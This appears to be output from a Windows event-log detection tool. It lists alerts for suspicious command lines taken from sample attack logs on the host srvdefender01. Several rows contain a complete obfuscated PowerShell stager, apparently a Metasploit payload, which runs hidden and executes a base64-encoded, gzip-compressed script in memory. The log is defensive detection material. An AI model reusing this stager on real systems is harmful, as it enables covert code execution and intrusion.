Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWi
ndow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dY
fCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: 
SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded 
PowerShell MSF payload via process execution.evtx +2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:01:03.003 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x123c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:02:03.009 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x10c0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:03:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:04:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x125c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:05:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with 
service over SMB (GLOBAL).evtx" +2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-22 00:06:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 00:07:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 